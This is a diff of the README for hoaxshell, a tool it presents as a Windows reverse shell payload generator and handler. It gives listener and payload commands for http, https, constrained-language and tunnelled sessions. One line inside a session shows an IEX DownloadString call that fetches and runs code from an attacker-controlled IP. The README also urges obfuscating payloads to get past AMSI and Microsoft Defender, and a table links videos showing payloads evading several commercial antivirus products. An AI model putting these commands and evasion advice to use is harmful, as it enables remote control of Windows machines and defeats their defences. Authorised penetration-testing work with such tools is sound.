Persistence of ReverseShell

README.md

@@ -1,24 +1,33 @@
 # hoaxshell
-
-[![Python](https://img.shields.io/badge/python-%E2%89%A5%203.6-yellow.svg)](https://www.python.org/) 
-<img src="https://img.shields.io/badge/powershell-%E2%89%A5%20v3.0-blue">
-[![Linux](https://svgshare.com/i/Zhy.svg)](https://svgshare.com/i/Zhy.svg)
-[![License](https://img.shields.io/badge/license-BSD-red.svg)](https://github.com/t3l3machus/hoaxshell/blob/main/LICENSE.md)
+[![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.6-yellow.svg)](https://www.python.org/) 
+<img src="https://img.shields.io/badge/PowerShell-%E2%89%A5%20v3.0-blue">
+<img src="https://img.shields.io/badge/Developed%20on-kali%20linux-blueviolet">
+[![License](https://img.shields.io/badge/License-BSD-red.svg)](https://github.com/t3l3machus/hoaxshell/blob/main/LICENSE.md)
 <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">
 
+#### ⚡ The latest version of this project is the [HoaxShell standalone listener](https://github.com/t3l3machus/hoaxshell/tree/main/revshells) which comes with refreshed payload templates. Wou can also use it directly from https://revshells.com (make sure to choose hoaxshell as the listener).
+
+:warning: As of 2022-10-18, hoaxshell is detected by AMSI ([malware-encyclopedia](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=VirTool%3aPowerShell%2fXoashell.A&threatid=2147833654)). You need to obfuscate the generated payload in order to use. Check out this video on how to obfuscate manually and bypass MS Defender:
+ - Example with Hoaxshell -> [youtube.com/watch?v=iElVfagdCD4](https://www.youtube.com/watch?v=iElVfagdCD4)
+ - Example with common powershell revshell templates -> [youtube.com/watch?v=3HddKylkRzM](https://www.youtube.com/watch?v=3HddKylkRzM)
+
 ## Purpose
+hoaxshell is a Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell, based on the following concept:  
 
-hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions, solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl).  
-  
-So far, it has been tested on fully updated **Windows 11 Enterprise**, **Windows Server 2016 Datacenter** and **Windows 10 Pro** boxes (see video and screenshots).
+![image](https://user-images.githubusercontent.com/75489922/197529603-1c9238ea-af14-41f7-8834-dd37ad77e809.png)
+
+This c2 concept (which could be implemented by using protocols other than http or pre-installed exes) can be used to establish sessions that promote the illusion of having a shell, but are far from an actual pty.
 
-**Disclaimer**: Purely made for testing and educational purposes. DO NOT run the payloads generated by this tool against hosts that you do not have explicit permission and authorization to test. While using this tool, you are responsible for any trouble you may cause.
+HoaxShell did well against AV software (check [AV bypass PoCs table](#AV-Bypass-PoCs) for more info). Although it is now generally detected, it is easy to obfuscate the generated payload(s) using automated tools or manually.
 
-### Video Presentation  
-https://www.youtube.com/watch?v=SEufgD5UxdU
+**Disclaimer**: Purely made for testing and educational purposes. DO NOT run the payloads generated by this tool against hosts that you do not have explicit permission and authorization to test. You are responsible for any trouble you may cause by using this tool.
+
+### Video Presentations  
+[2022-10-11] Recent & awesome, made by [John Hammond](https://twitter.com/_johnhammond) -> [youtube.com/watch?v=fgSARG82TJY](https://www.youtube.com/watch?v=fgSARG82TJY)  
+[2022-07-15] Original release demo, made by me -> [youtube.com/watch?v=SEufgD5UxdU](https://www.youtube.com/watch?v=SEufgD5UxdU)
 
 ## Screenshots
-![usage_example_png](https://raw.github.com/t3l3machus/hoaxshell/master/screenshots/hoaxshell-win11-v2.png)
+![image](https://user-images.githubusercontent.com/75489922/196024757-fcb13b73-153c-426f-a87c-bf35fd3e784d.png)
 
 Find more screenshots [here](screenshots/).
 
@@ -54,7 +63,8 @@ sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"
 sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization" -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"
 ```
 
-### Encrypted shell session (https)
+### Encrypted shell session (https + self-signed certificate)
+This particular payload is kind of a red flag, as it begins with an additional block of code that instructs PowerShell to skip SSL certificate checks, which makes it suspicious and easy to detect as well as significantly longer in length. Not recommended.
 ```
 # Generate self-signed certificate:
 openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
@@ -63,7 +73,6 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
 sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>
 
 ```  
-The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.
 
 ### Encrypted shell session with a trusted certificate
 If you own a domain, use this option to generate a shorter and less detectable https payload by providing your DN with -s along with a trusted certificate (-c cert.pem -k privkey.pem).
@@ -78,6 +87,15 @@ sudo python3 hoaxshell.py -s <your_ip> -g
 ```  
 **Important**: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).
 
+### Constraint language mode support
+Use any of the payload variations with the `-cm` (--constraint-mode) option to generate a payload that works even if the victim is configured to run PS in Constraint Language mode. By using this option, you sacrifice a bit of your reverse shell's stdout decoding accuracy.
+
+```
+sudo python3 hoaxshell.py -s <your_ip> -cm
+```  
+![image](https://user-images.githubusercontent.com/75489922/195785804-7fa3da9b-a10f-4c72-895a-0648271e7ec6.png)
+
+
 ### Shell session over https using tunneling tools ([Ngrok](https://ngrok.com) / [LocalTunnel](https://localtunnel.me))
 Utilize tunnelling programmes **Ngrok** or **LocalTunnel** to get sessions through secure tunnels, overcominge issues like not having a Static IP address or your ISP forbidding Port-Forwarding.
 
@@ -113,12 +131,25 @@ hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:44
 ```
 Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.
 
+## AV Bypass PoCs
+Some awesome people were kind enough to send me/publish PoC videos of executing hoaxshell's payloads against systems running AV solutions other than MS Defender, without being detected. Below is a reference table with links:
+
+**Important**: I don't know if you can still use hoaxshell effectively to bypass these solutions. It's only reasonable to assume the detectability will change soon (if not already).
+
+| AV Solution  | Date  | PoC  |
+|---|---|---|
+| SentinelOne | 2022-10-18 | https://twitter.com/i/status/1582137400880336896 |
+| Norton | 2022-10-17 | https://twitter.com/i/status/1582278579244929024 |
+| Bitdefender  | 2022-10-15  | https://www.linkedin.com/posts/rohitjain-19_hoaxshell-cy83rr0h1t-penetrationtesting-activity-6987080745139765248-8cdT?utm_source=share&utm_medium=member_desktop  |
+| McAfee  | 2022-10-15  | https://twitter.com/i/status/1581605531365814273  |
+| Kaspersky | 2022-10-13 | https://www.youtube.com/watch?v=IyMH_eCC4Rk |
+| Sophos  | 2022-09-08  | https://www.youtube.com/watch?v=NYR0rWx4x8k  |
+
+
 ## News
+ - `13/10/2022` - Added constraint language mode support (-cm) option.
  - `08/10/2022` - Added the `-ng` and `-lt` options that generate PS payloads for obtaining sessions using tunnelling tools **ngrok** or **localtunnel** in order to get around limitations like Static IP addresses and Port-Forwarding.  
  - `06/09/2022` - A new payload was added that writes the commands to be executed in a file instead of utilizing `Invoke-Expression`. To use this, the user must provide a .ps1 file name (absolute path) on the victim machine using the `-x` option.  
  - `04/09/2022` - Modifications were made to improve the command delivery mechanism as it included components that could be easily flagged. The `-t` option along with the `https_payload_trusted.ps1` were added. You can now use hoaxshell by supplying a domain name along with a trusted certificate. This will generate a shorter and less detectable https payload.  
  - `01/09/2022` - Added the `-H` option which allows users to give a custom name to the (random by default) header utilized in the attack process, carring the shell's session id. This makes the attack less detectable e.g. by using a standard header name e.g. "Authorization".
  - `31/08/2022` - Added the `-i` option that generates the PS payload adjusted to use "Invoke-RestMethod' instead of 'Invoke-WebRequest' utility, so now the user can choose (thanks to this [issue](https://github.com/t3l3machus/hoaxshell/issues/8)). I also fixed a bug that existed in the prompt (it sometimes messed the path).  
-
-
-